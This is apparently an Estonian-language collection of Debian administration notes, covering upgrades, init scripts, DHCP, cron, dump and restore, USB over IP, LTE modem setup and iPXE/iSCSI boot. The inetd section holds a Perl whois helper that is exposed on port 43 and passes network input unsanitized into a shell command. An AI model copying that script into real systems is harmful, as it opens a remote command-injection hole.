* vajadusel öelda (kui uuendatavas süsteemis mingil põhjusel oli alglaadur paigaldamata paketihaldusest)

# apt-get install grub-pc

* vajadusel öelda

# upgrade-from-grub-legacy

* kasutuses mitte olevate pakettide eemaldamine

# apt-get autoremove

* eemaldada /etc/apt/sources.list failid security eest kommentaarid ja rakendada uuendused
* kohendada käsitsi paketihaldusest uuendamise käigus vaikeväärtustega asendatud seadistusfailid

====Märkused====

* kui uuendamine peatub seetõttu, et mõne nö ebaolulise programmi käivitusskript ei tööta, siis sobib vastav pakett eemaldada, kui ka see ei õnnestu, siis võiks proovida käivitusskripti sisu asendada millegagi, mis formaalselt toimib, nt

# cat /etc/init.d/nagios3
#! /bin/sh
exit 0;

===Debian v. 6 Squeeze > v. 7 Wheezy uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 6.0 -> v. 7.0) juhend asub aadresil http://www.debian.org/releases/stable/amd64/release-notes/ch-upgrading.en.html

Debian v. 7 Wheezy GRUB2 versiooni on number selline

GNU GRUB version 1.99-27+deb7u1

Kui 2015 kevadel öelda

# apt-get update
Hit http://ftp.ee.debian.org wheezy Release.gpg
...
Reading package lists... Done
W: There is no public key available for the following key IDs:
7638D0442B90D010

siis aitab

# apt-get install debian-keyring debian-archive-keyring

===Debian v. 8 Jessie -> v. 9 Stretch uuendamine===

Operatsioonisüsteemi uuendus toimub nagu tavaliselt, kuid viimaks sobib öelda

# aptitude search ?obsolete
# aptitude purge ?obsolete

MySQL -> MariaDB uuendus toimub üldiselt automaatselt, aga sobib lõpus öelda (vt ligipääs failist /etc/mysql/debian.cnf)

# mysql_upgrade -h localhost -u debian-sys-maint -pparool

Kasulikud lisamaterjalid

* https://www.debian.org/releases/stretch/amd64/release-notes/ch-upgrading.en.html
* https://www.auul.pri.ee/wiki/MySQL_andmebaasi_kasutamine_operatsioonis%C3%BCsteemiga_Debian#Andmebaasi_uuendamine_MySQL_v._5.5_-.3E_MariaDB_v._10.1

===insserv käivitussüsteemi kasutamine===

Debian Squeeze v. 6.0 kasutab nn System-V-like käivitusskripte, kusjuures nende tööd saab seadistada insserv tarkvaraga

# cat /etc/init.d/nfsen
#!/bin/sh
set -e

### BEGIN INIT INFO
# Provides: nfsen
# Required-Start: $local_fs $remote_fs $network $time
# Required-Stop: $local_fs $remote_fs $network $time
# Should-Start: $syslog
# Should-Stop: $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: NfSen Server
### END INIT INFO

#!/bin/bash
case "$1" in
start)
echo "Starting NfSen server"
/srv/nfsen/bin/nfsen start
;;
stop)
echo "Stopping NfSen server"
/srv/nfsen/bin/nfsen stop
;;
*)
echo "Usage: /etc/init.d/nfsen {start|stop}"
exit 1
esac
exit 0

/etc/rc3.d jt rc kataloogide alla tekivad lingid öeldes

# insserv nfsen

Käivitusskriptile linkide eemaldamiseks sobib öelda

# insserv -r nfsen

Lisaks -n võtme lisamine ainult näitab, mis toimuks

# insserv -n -d nfsen

Required-Start: rea lõppu lisades nt 'postgresql' tulemusena käivitatakse kõnealune programm peale PostgreSQL andmebaasi.

Lisamaterjalid:

* http://wiki.debian.org/LSBInitScripts
* http://wiki.debian.org/LSBInitScripts/DependencyBasedBoot

===Dhcpd serveri kasutamine===

ISC DHCP tarkvara paigaldamiseks sobib öelda

# apt-get install dhcp3-server

DHCP serveri tööd juhib seadistusfail, nt

# cat /etc/dhcp/dhcpd.conf
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
log-facility local7;

shared-network auul {
option domain-name "auul";
option domain-name-servers 10.192.0.53;

subnet 192.168.50.0 netmask 255.255.255.0 {
range 192.168.50.200 192.168.50.224;
option routers 192.168.50.10;
}
}

Lisaks näidatakse failis /etc/default/isc-dhcp-server millistel võrguseadmetel teenust pakutakse

# cat /etc/default/isc-dhcp-server
...
INTERFACES="eth1"

DHCP serveri käivitab skript

# /etc/init.d/isc-dhcp-server stop|start

===At tööd===

Töö tekitamiseks sobib öelda

$ echo "date >> /tmp/test.log" | at -t 201509250950

Tööde nimekirja esitamiseks

$ atq
10 Fri Sep 25 09:50:00 2015 a imre

Tehtud tööd eemaldatakse automaatselt, tuleviku tööde eemaldamiseks

$ atrm 10

Töö sisu esitamiseks

$ at -c 10

===Cron tööd===

Debiani cron töid juhivad sellised seadistusfailid

* /etc/crontab
* /etc/cron.d - kataloogis sisalduvaid faile käsitletakse cron kirjeldusfailidena, /etc/crontab formaadis (st sisaldub user väli)
* /etc/cron.daily
* /etc/cron.hourly
* /etc/cron.monthly
* /etc/cron.weekly
* /var/spool/cron/kasutajanimi

Kasulikud lisamaterjalid

* man cron

===Anacron===

Anacron http://anacron.sourceforge.net/ ...

===tcp wrapper teegi kasutamine===

Paljud Debiani programmid on kompileeritud vastu libwrap teeki, mis tähendab, et nende tööd saab kontrollida /etc/hosts.allow ja /etc/hosts.deny failidest. Nt nrpe deemoni puhul selleks, et lubada ligipääsu võrgust 172.18.20.0/24 sobib kasutada

# cat /etc/hosts.allow
nrpe: 172.18.20.0/24

# cat /etc/hosts.deny
nrpe: ALL

Seadistustes tehtud muudatused kehtestuvad kohe, midagi ei ole vaja reloadida ega restartida. Seda kas programm on kompileeritud vastu librwap teeki saab küsida

# ldd /usr/sbin/nrpe | grep libwrap
libwrap.so.0 => /lib/libwrap.so.0 (0x00007fd00518b000)

===dump ja restore kasutamine===

Dump faili moodustamiseks

# umount /mnt/lvmkoitenimi
# dump -0uf /tmp/failinimi.dump /dev/system/lvmkoitenimi
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Dumping /dev/system/lvmkoitenimi (an unlisted file system) to /tmp/failinimi.dump
DUMP: Label: none
DUMP: Writing 10 Kilobyte records
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 66671 blocks.
DUMP: Volume 1 started with block 1 at: Tue Jul 12 23:45:47 2011
DUMP: dumping (Pass III) [directories]
DUMP: dumping (Pass IV) [regular files]
DUMP: Closing /tmp/failinimi.dump
DUMP: Volume 1 completed at: Tue Jul 12 23:45:48 2011
DUMP: Volume 1 66500 blocks (64.94MB)
DUMP: Volume 1 took 0:00:01
DUMP: Volume 1 transfer rate: 66500 kB/s
DUMP: 66500 blocks (64.94MB) on 1 volume(s)
DUMP: finished in 1 seconds, throughput 66500 kBytes/sec
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Date this dump completed: Tue Jul 12 23:45:48 2011
DUMP: Average transfer rate: 66500 kB/s
DUMP: DUMP IS DONE

kus

* -0 - tekitada full dump
* -u - kirjutada tegevuse kohta jälg /var/lib/dumpdates faili
* -f - salvestada dump näidatud faili

Dump failist taastamiseks

# mount /dev/system/lvmkoitenimi_2 /mnt/lvmkoitenimi_2
# cd /mnt/lvmkoitenimi_2
# restore -rf /tmp/failinimi.dump

kus

* -r - taastada dumpis käesolevasse kataloogi, mis on kuhu on monteeritud tühi failisüsteem
* -f - kasutatav dump fail

===inetd===

Debian Squeeze paketihaldusest saab valida erinevaid inetd servereid, openbsd-inetd paigaldamiseks sobib öelda

# apt-get install openbsd-inetd

2011. aasta keskel v. 1.3.5 sisaldab libexec/Lookup.pm teeki, kuhu on sisse kirjutatud whois.cyberabuse.org serveri nimi, kuid see server ei paku enam sobival viisil teenust ning tulemuseks on, et NfSen liideses ei saa enam ip aadressidel teha päringuid. Üheks alternatiiviks on seadistada käima lokaalne whois teenus, nt ühendades 43/tcp port ja sellise Perli skripti sisend ja väljund kokku inetd abil

# cat /srv/data/nfsen/libexec/whois.pl
#!/usr/bin/perl
my $filename = <>;

foreach $rida($filename) {
$vastus=`/usr/bin/whois $rida`;
print $vastus;
last;
};

ning kasutades /etc/inetd.conf seadisusfailis rida

43 stream tcp nowait nobody /srv/data/nfsen/libexec/whois.pl whois.pl

whois päringute esitamise kontrollimiseks sobib öelda

$ whois -h 127.0.0.1 127.0.0.1
..
NetRange: 127.0.0.0 - 127.255.255.255
CIDR: 127.0.0.0/8
OriginAS:
NetName: SPECIAL-IPV4-LOOPBACK-IANA-RESERVED
NetHandle: NET-127-0-0-0-1
Parent:
NetType: IANA Special Use

Kasutaja peab ise otsustama, kas talle selline lahendus sobib.

Kasulikud lisamaterjalid

http://www.telecom.otago.ac.nz/tele301/student_html/inetd-tcpwrappers.html

===RPC portmapper===

Debain Squeeze paketihaldusest saab valida erinevaid RPC portmap lahendusi, portmap paigaldamiseks sobib öelda

# apt-get install portmap

Arvutis töötavate RPC teenuste nimekirja küsimiseks sobib öelda

# rpcinfo -p hostname

Tundub, et rpcbind toetab erinevalt portmap tarkvarast IPv6 protokolli.

===Netlink socket===

ip programm suhtleb tuumaga kasutades netlink socket'it, mis praktiliselt tähendab nt seda, et ip programmi saab kasutada chroot keskkonnast, kus pole /proc failisüsteemi külge monteeritud (erinevalt ifconfig programmist, mis kasutab /proc failisüsteemi).

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Netlink
* http://www.linuxjournal.com/article/7356?page=0,0

===Process accounting===

Operatsioonisüsteemi Debian Squeeze vaikimisi tuum võimaldab koguda process accountiga andmeid. Seda sobib teha nt acct paketi tarkvara abil, paigaldamiseks sobib öelda

# apt-get install acct

Tulemusena paigaldatakse muu hulgas sellised failid

* /usr/bin/lastcomm
* /usr/bin/ac
* /usr/sbin/accton
* /usr/sbin/sa
* /usr/sbin/dump-utmp
* /usr/sbin/dump-acct
* /etc/cron.daily/acct
* /etc/init.d/acct
* /etc/default/acct
* /etc/cron.monthly/acct

Selleks, et arvutis töötavate protsesside kohta andmed kogunema hakkaksid, vaikimisi faili /var/log/account/pacct, tuleb öelda

# accton on | off

Kogutud andmete esitamine toimub selliselt

# dump-acct /var/log/account/pacct | tail -n 5
tail |v3| 0.00| 0.00| 0.00| 0| 0| 4088.00| 0.00| 19856 19253|Mon Sep 19 20:34:56 2011
cron |v3| 0.00| 0.00| 1.00| 0| 0| 18832.00| 0.00| 19857 1138|Mon Sep 19 20:35:01 2011
ssh |v3| 0.00| 1.00| 75.00| 0| 0| 43192.00| 0.00| 19860 19633|Mon Sep 19 20:35:06 2011
postgres |v3| 0.00| 0.00| 2.00| 109| 113| 94272.00| 0.00| 19863 1395|Mon Sep 19 20:35:09 2011
telnet |v3| 0.00| 0.00| 3.00| 1000| 1000| 22680.00| 0.00| 19870 19865|Mon Sep 19 20:35:19 2011

kus kuuendas tulbas on protsessi UID väärtus.

===Passwords and encryption keys (Seahorse)===

TODO

===Mälu kasutamine===

Arvuti mälu kasutamise kohta saab küsida selliselt

# free
total used free shared buffers cached
Mem: 509172 501192 7980 0 3784 200248
-/+ buffers/cache: 297160 212012
Swap: 1048568 92568 956000

kus

* total (509172) - kogu RAM (miinus natuke kerneli tarvis)
* used (501192) - kokku kasutusel
* free (7980) - kokku vaba
* buffers (3784) - kasutusel mälust on nii palju kasutusel buffers all
* cached (200248) - kasutusel mälust on nii palju kasutusel failisüsteemi cache'ina
* teisel real on toodud arvutatud used ja free, mis vastavad sellele, kui buffers + cached oleks vastavalt maha lahutatud või juurde liidetud; selline vaade on õigustatud, kuna Linux tuum vajadusel kasutab failisüsteemi cache'iks olevat mälu ressurssi muuks tarbeks

297160 = 501192 - 3784 - 200248
212012 = 7980 + 3784 + 200248

st kasutatud mälu on tegelikult vähem kui näib ja vaba mälu on vastavalt samapalju rohkem kui näib.

====Jõudlus====

Arvuteid on valmistatud kasutes erinevaid tehnoloogiaid ja lisaks muudele erinevustele erinevad nad ka mälu kasutamise kiiruse poolest. Üks võimalus mälu kasutamise jõudlust hinnata nö sünteetilise testiga (st spetsiaalselt selleks tarbeks valmistatud programmo abil), nt

* http://www.cs.virginia.edu/stream/
* https://github.com/gregs1104/stream-scaling

Kasutamiseks tuleb viimaselt lingilt kopeerida tar.gz fail, pakkida arhiiv lahti ning öelda

$ ./stream-scaling

Tulemusena kompileeritakse programm, seejärel käivitatakse ning väljastatakse tulemus, nt

$ ./stream-scaling
=== CPU cache information ===
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Data)
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Instruction)
CPU /sys/devices/system/cpu/cpu0 Level 2 Cache: 6144K (Unified)
...
Total CPU system cache: 25296896 bytes
Suggested minimum array elements needed: 11498589
Array elements used: 11498589

=== CPU Core Summary ===
processor : 3
model name : Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz
cpu MHz : 1998.000
siblings : 4

=== Testing up to 4 cores ===
...
-------------------------------------------------------------
Function Rate (MB/s) Avg time Min time Max time
Copy: 4101.0477 0.0453 0.0449 0.0456
Scale: 4121.7264 0.0451 0.0446 0.0458
Add: 4982.5056 0.0557 0.0554 0.0560
Triad: 5001.9268 0.0556 0.0552 0.0561
-------------------------------------------------------------
Solution Validates
-------------------------------------------------------------

Number of Threads requested = 2
Function Rate (MB/s) Avg time Min time Max time
Triad: 5002.6618 0.0566 0.0552 0.0610

Number of Threads requested = 3
Function Rate (MB/s) Avg time Min time Max time
Triad: 4892.7425 0.0577 0.0564 0.0607

Number of Threads requested = 4
Function Rate (MB/s) Avg time Min time Max time
Triad: 4784.1065 0.0582 0.0577 0.0589

Mälu jõudlust on eriti mõtet hinnata selleks, et võrrelda olemasolevat süsteemi uuega, millega olemasolev kavatsetakse asendada.

===Ressursikasutuse haldamine===

* IO

# ionice -c 3 -p 1919

* CPU

# renice ...

===Protsesside haldamine===

Kasutaja postgres protsesside nimekirja nimekirja esitamine

# ps -a -f -u postgres

Kasutaja postgres protsesside ja vastavate lõimede nimekirja esitamine

# ps -aLf -u postgres

====Protsesside grupp====

TODO

<pre>
# ps -efj | less
</pre>

===pdftk kasutamine===

pdftk http://www.pdflabs.com/docs/install-pdftk/ paigaldamiseks sobib öelda

# apt-get install pdftk

===tvtime kasutamine===

# apt-get install tvtime

ning näidata

Please choose the TV standard to use -> PAL
Please choose the frequency table to use -> Custom (must run tvtime-scanner first)
Please choose the video4linux device which corresponds to your capture card -> /dev/video0
Please choose the device that will be used in NTSC areas for decoding closed captions and XDS channel information; Device to use for VBI decoding -> /dev/vbi0
Please choose whether tvtime should be "setuid root", therefore getting root privileges when running -> No

Esmalt tuleb laadida TV kaardile vastav draiver, nt selliselt

# rmmod saa7134
# modprobe saa7134 card=21 tuner=26

kus

* card sobiv valik tagab pildi
* tuner sobiv valik tagab heli

Seejärel skaneerida kanalid

$ tvtime-scanner
Reading configuration from /etc/tvtime/tvtime.xml
Scanning using TV standard PAL.
Scanning from 44.00 MHz to 958.00 MHz.
Found a channel at 607.00 MHz (605.50 - 608.25 MHz), adding to channel list.
I/O warning : failed to load external entity "/home/imre/.tvtime/stationlist.xml"
station: No station file found, creating a new one.

ning käivitada tvtime programm

# tvtime

Kasulikud lisamaterjalid

* https://sites.google.com/site/jobinau2/saa7130basedtvtunercardunderlinux

===PAM===

TODO

====Kasutaja autentimine pam_unix abil====

/etc/shadow failis on üldiselt toetatud sellised räsid

* $1$ - MD5
* $2a$ - blowfish
* $5$ - SHA-256
* $6$ - SHA-512

Kui osutab, et /etc/shadow ei tööta, st nt peale süsteemi uuendamist kasutaja sisestab õige parooli kuid ei saa sisse logida, siis tõenäoliselt ei sobi kokku /etc/pam.d/* seadistusfailid /etc/shadow sisuga.

Kasulikud lisamaterjalid

* http://digitalconsumption.com/forum/615-Blowfish-shadow-files-on-Debian

===Gnome-shell===

Gnome shell http://en.wikipedia.org/wiki/GNOME_Shell on ... ja kasutamine eeldab

* 3D toega videokaardi olemasolu, kusjuures kaart peab nö sobima (nt Radeon HD 3600 fglrx draiveriga annab vigu nö olulises kohas, GeForce 7600 GS nouveau draiveriga sobib)

Olulised asjad

* extensions
* gnome-tweak-tool

===USB over IP===

USB over IP tarkvara http://usbip.sourceforge.net/ abil saab teha ühe arvuti füüsilised USB seadme üle võrgu kasutatavaks teisest avutist.

Praktiliselt voib olla hada sellest, et user space ja kernel space tarkvara ei sobi kokku. Nt tundub, et Ubuntu (sh v. 14.04) paketihalduses on usbip v. 0.7, aga tuumas talle vajalikke mooduleid pole. Teine variant on, et kasutada saab usbip v. 1.1, millega tuuma moodulid naikse paremini kokku sobivat. Debian Jessie sisaldab 2014 aasta suvel v. 1.1 tarvkara ja see paistab töötavat.

====Tööpõhimõte====

TODO

====Tarkvara paigaldamine====

Tarkvara paigladamiseks sobib mõlemas arvuti öelda

# apt-get install usbip

Paigaldamise tulemusena tekib failisysteemi muu hulgas

* usbip - utiliit serveri seadistamiseks ja kliendi juhtimiseks
* usbipd - serveri poolel tootav deemon

====Serveri poole ettevalmistamine ja käivitamine====

Laadida moodulid

server:~# modprobe usbip_core
server:~# modprobe usbip_host

Käivitada usbipd deemon, kuulab vaikimisi 3240/tcp pordil

server:~# usbipd

USB seadmete serveris olevate USB seadmete nimekirja esitamiseks sobib öelda

server:~# usbip list --local
Local USB devices
=================
- busid 1-1 (8087:0024)
Intel Corp. : Integrated Rate Matching Hub (8087:0024)
1-1:1.0 -> hub

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usb-storage

- busid 1-1.4 (0424:2514)
Standard Microsystems Corp. : USB 2.0 Hub (0424:2514)
1-1.4:1.0 -> hub

- busid 1-1.4.3 (046d:c31d)
Logitech, Inc. : Media Keyboard K200 (046d:c31d)
1-1.4.3:1.0 -> usbhid
1-1.4.3:1.1 -> usbhid

- busid 1-1.4.4 (046d:c05a)
Logitech, Inc. : M90/M100 Optical Mouse (046d:c05a)
1-1.4.4:1.0 -> usbhid

- busid 1-1.5 (04e6:e001)
SCM Microsystems, Inc. : SCR331 SmartCard Reader (04e6:e001)
1-1.5:1.0 -> usbfs

Seadme eksportimiseks sobib oelda, nt Cruizer USB pulk jaoks

server:~# usbip bind -b 1-1.2
bind device on busid 1-1.2: complete

Tulemusena on --list väljundis vastav seade

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usbip-host

====Kliendi poole ettevalmistamine ja käivitamine====

Laadida moodul

klient:~# modprobe vhci_hcd

Eksporditud seadmete nimekirja küsimiseks sobib öelda kliendi arvutis

klient:~# usbip list -r 192.168.10.10
Exportable USB devices
======================
- 192.168.10.10
1-1.2: SanDisk Corp. : Cruzer (0781:5530)
: /sys/devices/pci0000:00/0000:00:07.0/usb1/1-1/1-1.2
: (Defined at Interface level) (00/00/00)
: 0 - Mass Storage / SCSI / Bulk-Only (08/06/50)

Seadme kasutamiseks

klient:~# usbip attach -r 192.168.10.10 -b 1-1.2

Seejärel on seade paistab nagu kohalik seade ja on valmis kasutamiseks, nt

klient:~# lsusb
Bus 009 Device 004: ID 0781:5530 SanDisk Corp. Cruzer
..

ja usbip spetsiifilisemalt

klient:~# usbip port
Imported USB devices
====================
Port 00: <Port in Use> at High Speed(480Mbps)
unknown vendor : unknown product (0781:5530)
9-1 -> usbip://192.168.10.10:3240/1-1.2
-> remote bus/dev 001/037

Kasutamise lõpetamiseks sobib öelda kasutades vhci_hcd pordi numbrit

klient:~# usbip detach --port=0

====Serveri poolel kasutamise lõpetamine====

Peale seda kui kliendi pool on seadme kasutamine lõpetatud, öelda

server:~# usbip unbind -b 1-1.2
unbind device on busid 1-1.2: complete

====Kasulikud lisamaterjalid====

* http://www.howtoforge.com/how-to-set-up-a-usb-over-ip-server-and-client-with-debian-lenny
* https://www.kernel.org/doc/readme/drivers-staging-usbip-userspace-README

===Töötamine failisüsteemiga===

Tavaliselt on häda miinus märgiga failidega töötamisel, -- võtme kasutamine aitab, nt '-failinimi' nimelise faili kustutamisel

$ rm -- -failinimi

===USB netipulga kasutamine===

USB netipulga kasutamine koosneb kahest osast

* arvutis peavad olema /dev/ttyUSB* nimelised usb serial seadmed
* ppp ühenduse loomiseks tuleb kasutada sobivat programmi, wvdial, Gnome desktopilt midagi vms

====Tööpõhimõte====

Kui netipulk ei tööta automaatselt, siis võib olla probleem selles, et süsteem tunneb ta ära storage seadmena ja mitte võrguseadmena

<pre>
[11360165.312014] usb 1-4: new high-speed USB device number 10 using ehci-pci
[11360165.458578] usb 1-4: New USB device found, idVendor=12d1, idProduct=1505
[11360165.458734] usb 1-4: New USB device strings: Mfr=3, Product=2, SerialNumber=0
[11360165.458900] usb 1-4: Product: HUAWEI Mobile
[11360165.459001] usb 1-4: Manufacturer: Huawei Technologies
[11360165.460790] usb-storage 1-4:1.0: USB Mass Storage device detected
[11360165.461082] scsi10 : usb-storage 1-4:1.0
[11360166.461381] scsi 10:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 0
[11360166.478285] sr1: scsi-1 drive
[11360166.478582] sr 10:0:0:0: Attached scsi CD-ROM sr1
[11360166.478694] sr 10:0:0:0: Attached scsi generic sg5 type 5
</pre>

usb-modeswitch paketi tarkvara teeb temast võrguseadme.

====/dev/ttyUSB* seadmete tekitamine====

E392 kirjaga netipulk paistab faili usb.ids tõttu

# grep 1505 /var/lib/usbutils/usb.ids
1505 E398 LTE/UMTS/GSM Modem/Networkcard

lsusb väljundis E398

Bus 001 Device 041: ID 12d1:1505 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

Kusjuures /dev kataloogis pole usb serialile vastavaid faili, st /dev/ttyUSB* nimelisi.

Kasutamiseks sobib tekitada fail

# cat /etc/usb_modeswitch.d/12d1\:1505
# Huawei E392

DefaultVendor= 0x12d1
DefaultProduct= 0x1505

TargetVendor= 0x12d1
TargetProductList=0x1506

MessageContent="55534243123456780000000000000011062000000100000000000000000000"

ning lisada faili /lib/udev/rules.d/40-usb_modeswitch.rules lõpupoole rida

# Huawei E392
ATTRS{idVendor}=="12d1", ATTRS{idProduct}=="1505", RUN+="usb_modeswitch '%b/%k'"

Seejärel võtta pulk usb pesast välja ja uuesti sisse panna, lsusb väljundis peaks nüüd olema, 1506 -> 1505 muutunud

Bus 001 Device 043: ID 12d1:1506 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

ning lisaks tekkinud seadmed

# ls -ld /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Dec 20 01:27 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Dec 20 01:16 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Dec 20 01:16 /dev/ttyUSB2

Tundub, et kui systemd millegipärast ei taha käivitada sobib öelda

# /usr/sbin/usb_modeswitch --default-vendor 0x12d1 --default-product 0x1505 -J

====wvdial kasutamine====

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone =
Username =
Password =
New PPPD = yes

Modem Type = Analog Modem
Phone = *99#
ISDN = 0
Baud = 460800
Username = " "
Password = " "
Modem = /dev/ttyUSB0
Init1 = ATZ
Init2 = at+cgdcont=1,"ip","internet.emt.ee"
Stupid Mode = 1

kus

* TODO

käivitamiseks sobib öelda

# wvdial
--> WvDial: Internet dialer version 1.61
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: at+cgdcont=1,"ip","internet.emt.ee"
at+cgdcont=1,"ip","internet.emt.ee"
OK
--> Modem initialized.
--> Sending: ATDT*99#
--> Waiting for carrier.
ATDT*99#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Fri Dec 20 01:35:25 2013
--> Pid of pppd: 17139
--> Using interface ppp0
--> local IP address 10.128.53.223
--> remote IP address 10.64.64.64
--> primary DNS address 217.71.33.151
--> secondary DNS address 217.71.33.150

Tulemusena tekib ppp0 seade üle mille saab liiklust ruutida (teiste arvutite liiklust tuleb src nat'tida)

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:10.128.77.124 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:70 (70.0 B) TX bytes:157 (157.0 B)

====Kasulikud lisamaterjalid====

* http://trisquel.info/en/forum/install-huawei-e392-usb-lte-drivers
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?t=681
* http://blog.bluedrive.ro/?p=28
* http://www.draisberghof.de/usb_modeswitch/
* https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/889878
* http://importgeek.wordpress.com/tag/12d11505/
* http://www.draisberghof.de/usb_modeswitch/bb/
* http://oliver.tele2.ee/kuidas-huawei-e1752-ja-ubuntu-10-04-kasikaes-internetti-lahevad/
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?f=4&t=891&p=5898&hilit=12d1%3A1505#p5898

===zip arhivaatori kasutamine===

Parooliga kaitstud arhiivi moodustamiseks sobib öelda nt

$ zip -r --password parool katalooginimi.zip katalooginimi

===Pipe viewer===

Pipe viewer programmiga saab jälgida läbi toru mineva progressi. Paigaldamiseks sobib öelda

# apt-get install pv

Kasutamine paistab välja sedasi

# timeout 10 cat /dev/zero | pv > /dev/null
4GB 0:00:07 [1.91GB/s] [ <=>
..

===AUFS===

AUFS http://aufs.sourceforge.net/ võimaldab mitme kataloogi sisu esitada ühes nö virtuaalses kataloogis. Alternatiivne võimalus on seda saavutada UnionFS abil.

# mount -t aufs -o dirs=/tmp/kata1:/tmp/kata2:/root/kata3 none /tmp/dir

===Network manager===

Lisaks Network manager graafilisele kasutajaliidesele on olemas ka käsurea utiliit nmcli

# nmcli -p dev
================================================
Status of devices
================================================
DEVICE TYPE STATE CONNECTION
------------------------------------------------
docker0 bridge connected docker0
vetha88a ethernet connected vetha88a
br0 openvswitch connected br0
br3 openvswitch connected br3
tep0 openvswitch connected tep0
eth0 ethernet unmanaged --
lo loopback unmanaged --
ovs-system openvswitch unmanaged --

===Skänneri kasutamine===

# apt-get install

Kasulikud lisamaterjalid

* https://help.ubuntu.com/community/ScanningHowTo
* http://www.sane-project.org/sane-backends.html

===Logrotate===

Näitab, mis toimub, aga midagi failisüsteemis vms ei tee

# logrotate -d /etc/logrotate.conf

Teeb nö jõuga

# logrotate -f /etc/logrotate.conf

Roteeritud failide nimedes kuupäeva kasutamiseks sobib logrotate seadistusfailide vastavates sektsioonides kasutada lisaks rida

dateext

Tulemuseks on nt

/var/log/apache2/access.log-20140922.gz

===iPXE===

Käesolevas tekstis mainitud dhcp serveri tarkvarana sobib kasutada paketti

# apt-get install isc-dhcp-server

ja tftpd serverina paketti

# apt-get install atftpd

iPXE tarkvara paketist

# apt-get install ipxe

====Tööpõhimõte====

Kui on kasutada nö tavalise PXE toega võrgukaardiga arvuti, siis üks viis iPXE tarkvara kasutamiseks on laadida see dhcp + tftp serverilt, nt sellise sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

filename "undionly.kpxe";
next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
}

kus

* undionly.kpxe - paketist 'apt-get install ipxe'

Tulemusena ilmub vastava arvuti ekraanile iPXE ja Ctrl-B abil saab siseneda iPXE keskkonda. Nt võrgust Debian Jessie installeri käivitamine toimub sedasi

chain http://ftp.imool.ee/pub/incoming/imre/dj-install.ipxe

kus pöördutaval aadressil on tekst sisuga

# cat dj-install.ipxe
#!ipxe
kernel http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
initrd http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
boot

Seejärel käivitab Debian installer. Paistab, et Jessie oskab iSCSI peale paigaldada.

'chain' ütlemist saab automatiseerida nt sellise DHCP serveri sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
if exists user-class and option user-class = "iPXE" {
filename "http://ftp.imool.ee/pub/incoming/imre/ipxe";
} else {
filename "undionly.kpxe";
}
}

* esmalt klient arvuti töötab PXE abil DHCP kliendina ja laaditakse undionly.kpxe
* seejärel klient arvuti töötab iPXE abil DHCP kliendina ja pöördutakse http://ftp.imool.ee/pub/incoming/imre/ipxe poole

====Debian v. 8 Jessie kasutamine diskless iSCSI kliendina====

Üks praktiline vajadus iPXE jaoks on iSCSI ressursi kautamine juurfailisüsteemina. Selleks sobib Debian v. 8 Jessie paigaldada eelmises punktis näidatud viisil ja failisüsteemid paigutada iSCSI peale. Paigaldatud arvuti käivitamiseks sobib kasutada sellist iPXE skripti

# cat scsi-boot.ipxe
#!ipxe

dhcp
set initiator-iqn iqn.1993-08.org.debian:01:6f3ac5994d50
sanboot iscsi:10.1.1.15::::iqn.2000-01.com.synology:syno-varundus-1.imretest.989d9f15bf

kus

* TODO

mis laaditakse dchp serveri seadistusfailist reaga

..
filename "http://ftp.imool.ee/pub/incoming/imre/iscsi-boot.ipxe";
...

Kui Debian Jessie peaks bootimisel jääma initramfs prompti, siis võib aidata käsitsi sobivate argumentidega öelda

# iscsistart ...

või pärida iPXE käest

# iscsistart -b

kus

* -t - ...

====Kasulikud lisamaterjalid====

* http://backreference.org/2013/12/23/diskless-iscsi-boot-with-pxe-howto/
* http://www.heath-bar.com/blog/?p=184
* http://etherboot.org/wiki/sanboot/debian_lenny_iscsi
* http://ipxe.org/cmd/sanboot
* http://wiki.openelec.tv/index.php/Network_Boot_-_iSCSI
* http://jpmens.net/2011/07/18/network-booting-machines-over-http/

===D-Bus===

D-Bus http://www.freedesktop.org/wiki/Software/dbus/ ...

